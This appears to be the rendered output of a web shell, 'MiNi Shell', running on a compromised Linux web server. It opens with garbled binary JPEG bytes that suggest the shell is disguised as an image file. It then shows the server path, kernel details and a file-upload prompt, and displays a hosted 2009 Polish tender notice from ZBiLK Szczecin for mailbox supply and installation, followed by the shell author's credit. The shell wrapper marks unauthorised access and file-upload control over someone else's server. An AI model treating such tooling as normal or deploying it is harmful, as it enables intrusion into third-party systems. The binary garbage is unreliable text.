JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20090605/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20090605/88435-N-2009.html

<p class="kh_header"><b>Szczecin: Dostawę i montaż skrzynek pocztowych wieloskrytkowych, koszy na ulotki reklamowe oraz pojemników na makulaturę, w budynkach zarządzanych 
przez ZBiLK w Szczecinie, w podziale na dwie części</b><br>
<b>Numer ogłoszenia: 88435 - 2009; data zamieszczenia: 05.06.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Zarząd Budynków i Lokali Komunalnych Zakład Budżetowy , ul. Mariacka 25, 70-546 Szczecin, woj. zachodniopomorskie, tel. 091 4886333, 4886301, faks (091) 48 93 831, 4893832.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> http:/WWW.ZBiLK.szczecin.pl/</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawę i montaż skrzynek pocztowych wieloskrytkowych, koszy na ulotki reklamowe oraz pojemników na makulaturę, w budynkach zarządzanych 
przez ZBiLK w Szczecinie, w podziale na dwie części.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.	Przedmiotem zamówienia jest Dostawa i montaż skrzynek pocztowych wieloskrytkowych, w budynkach zarządzanych przez ZBiLK w Szczecinie zgodnie z ustawą Prawo Pocztowe   z 12.06.2003 r. (Dz. U. z 2003 r. Nr 130 poz. 1188, ze zmianami) oraz rozporządzeniem Ministra Infrastruktury z 24.09.2003 r. w sprawie oddawczych skrzynek pocztowych (Dz. U. z 2003 r. Nr 177, poz. 1731, ze zmianami, w podziale na dwie części:
1.1.	Część I zamówienia - Dostawa i montaż skrzynek pocztowych wieloskrytkowych, koszy na ulotki reklamowe oraz pojemników na makulaturę w budynkach zarządzanych przez ZBiLK w Rejonie 2, 3, 4, 5, 7,
1.2.	Część II zamówienia - Dostawa i montaż skrzynek pocztowych wieloskrytkowych, koszy na ulotki reklamowe oraz pojemników na makulaturę w budynkach zarządzanych przez ZBiLK w Rejonie 8, 9, 13, 14, 15, SP.
2.	Przedmiot zamówienia obejmuje w szczególności:
2.1.	dostawa skrzynek pocztowych wieloskrytkowych wraz z kompletem dwóch sztuk kluczy patentowych do każdej skrytki,
2.2.	sukcesywny demontaż istniejących skrzynek pocztowych z zapewnieniem bieżącego odbioru dostarczanej korespondencji,
2.3.	wykonanie prac towarzyszących, niezbędnych przed zamontowaniem nowych skrzynek pocztowych wieloskrytkowych, polegających na uzupełnieniu tynku wraz z malowaniem części ściany w nowych budynkach w kolorze ściany, natomiast w starych - doprowadzenie do zadowalającego stanu estetycznego,
2.4.	oznakowanie numerami lokali nowych skrzynek pocztowych po wcześniejszym uzgodnieniu wykazu adresowego z przedstawicielem Zamawiającego,
2.5.	montaż nowych skrzynek pocztowych jedno-, dwu-, trzy-, cztero- i pięcioskrytkowych wewnętrznych i zewnętrznych (zabezpieczonych antykorozyjnie przez cynkowanie), w kolorze uzgodnionym z zamawiającym (szara obudowa, granatowe drzwiczki) o odpowiedniej sztywności konstrukcji,
2.6.	skrzynki powinny posiadać otwory rewizyjne pozwalające na sprawdzanie, czy we wnętrzu znajduje się korespondencja,
2.7.	konstrukcja otworu wrzutowego musi zabezpieczać korespondencję przed wyjęciem przez osoby trzecie,
2.8.	drzwiczki poszczególnych modułów, powinny otwierać się na bok i posiadać metalowe zamki, niepowtarzające się w obrębie nieruchomości,
2.9.	wymiana uszkodzonych elementów powinna być możliwa przy użyciu prostych, typowych narzędzi, bez demontażu zestawu,
2.10.	montaż na ścianie koszy na reklamy zgodnie z dostarczonym wykazem adresowym,
2.11.	montaż na ścianie niepalnych pojemników z napisem MAKULATURA zgodnie z dostarczonym wykazem adresowym..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 44.42.20.00-4.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 4.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> 1.	Wadium należy wnieść w wysokości:
1.1.	  2 153,70 zł - dla Części I zamówienia (słownie: dwa tysiące sto pięćdziesiąt trzy złote siedemdziesiąt groszy),
1.2.	  2 094,15 zł - dla Części II  zamówienia (słownie: dwa tysiące dziewięćdziesiąt cztery złote piętnaście groszy).



W przypadku składania oferty na dwie części zamówienia, należy zsumować powyższe wartości wadium.
2.	Wadium należy wnieść w terminie do dnia 17.06.2009 r. do godziny 1200. Decyduje data wpływu środków do zamawiającego.
3.	Wadium może być wnoszone:
3.1.	w pieniądzu - przelewem na konto ZBiLK w ING Bank Śląski Oddział Szczecin nr 93 1050 1559 1000 0022 4355 2706, 
3.2.	poręczeniach bankowych lub poręczeniach kasy oszczędnościowo-pożyczkowej (z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym),gwarancjach bankowych, gwarancjach ubezpieczeniowych, poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2) ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości.
    Dokumenty, o których mowa w pkt 3.2 należy zdeponować w siedzibie ZBiLK przy ul. Mariackiej 25 w pokoju nr 9.<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> 1.	O udzielenie zamówienia mogą ubiegać się wykonawcy którzy: 
1.1.	posiadają uprawnienia do wykonywania określonej działalności lub czynności, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień, 
1.2.	posiadają niezbędną wiedzę i doświadczenie oraz dysponują potencjałem technicznym i osobami zdolnymi do wykonania zamówienia lub przedstawią pisemne zobowiązanie innych podmiotów do udostępnienia potencjału technicznego i osób zdolnych do wykonania zamówienia,
1.3.	znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia,
1.4.	nie podlegają wykluczeniu z postępowania o udzielenie zamówienia,
1.5.	spełniają następujący warunek dodatkowy - wykonali w ciągu ostatnich trzech lat przed dniem wszczęcia postępowania o udzielenie zamówienia publicznego (a jeżeli okres prowadzenia działalności jest krótszy-w tym okresie) minimum trzy prace podobne do objętej przedmiotem zamówienia. Za jedną pracę podobną zamawiający uzna pracę polegającą na dostawie wraz montażem skrzynek pocztowych wieloskrytkowych,  w ilości min. 2 000 szt. skrytek, bez względu na ilość części na jaką złoży ofertę. 
2.	Spełnienie warunków uczestnictwa w postępowaniu oceni zamawiający na podstawie złożonych przez Wykonawcę oświadczeń i dokumentów wymaganych do potwierdzenia spełnienia warunków udziału w postępowaniu, wskazanych w ust. 1, metodą spełnia/nie spełnia..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> 1.	Oświadczenie wykonawcy, według wzoru, stanowiącego załącznik nr 2 do siwz, o spełnianiu warunków określonych w art. 22 ust. 1 ustawy, 
W przypadku składania oferty wspólnej w/w oświadczenie składa pełnomocnik w imieniu  wykonawców składających ofertę wspólną.
2.	Aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej (jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności), wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert. 
W przypadku składania oferty wspólnej w/w dokument składa każdy z wykonawców składających ofertę wspólną.
3.	Wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych dostaw w okresie ostatnich trzech lat przed dniem wszczęcia postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, odpowiadających swoim rodzajem i wartością  dostawom stanowiącym przedmiot zamówienia, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców według wzoru, stanowiącego załącznik nr 4 do siwz oraz dokumenty potwierdzające, że usługi te zostały wykonane należycie. 
W przypadku składania oferty wspólnej wykonawcy składający ofertę wspólną składają jeden wspólny w/w wykaz. Warunek zostanie uznany przez zamawiającego za spełniony, jeżeli wykonawcy składający ofertę wspólną będą spełniać go łącznie. 
4.	W celu potwierdzenia, że oferowane dostawy odpowiadają wymaganiom określonym przez zamawiającego, zaświadczenie podmiotu uprawnionego do kontroli jakości potwierdzające, że dostarczane produkty odpowiadają normom, określonym w Rozporządzenia Ministra Infrastruktury  z dnia 24.09.2003 r. (Dz. U. 177 poz. 1731) i z dnia 15.04.2004 r. (Dz. U. 83 poz. 770) oraz PN-EN 13724:2004.
W przypadku składania oferty wspólnej należy złożyć jeden dokument..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.zbilk.szczecin.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Zarząd Budynków i Lokali Komunalnych
Zakład Budżetowy
ul. Mariacka 25, pokój nr 9
70-546 Szczecin.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 17.06.2009 godzina 12:00, miejsce: Zarząd Budynków i Lokali Komunalnych
Zakład Budżetowy
ul. Mariacka 25, pokój nr 9
70-546 Szczecin.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Dostawa i montaż skrzynek pocztowych wieloskrytkowych, w budynkach zarządzanych przez ZBiLK w Szczecinie.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Dostawa i montaż skrzynek pocztowych wieloskrytkowych, koszy na ulotki reklamowe oraz pojemników na makulaturę w budynkach zarządzanych przez ZBiLK w Rejonie 2, 3, 4, 5, 7.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 44.42.20.00-4.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 4.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Dostawa i montaż skrzynek pocztowych wieloskrytkowych, w budynkach zarządzanych przez ZBiLK w Szczecinie.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Dostawa i montaż skrzynek pocztowych wieloskrytkowych, koszy na ulotki reklamowe oraz pojemników na makulaturę w budynkach zarządzanych przez ZBiLK w Rejonie 8, 9, 13, 14, 15, SP.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 44.42.20.00-4.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 4.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com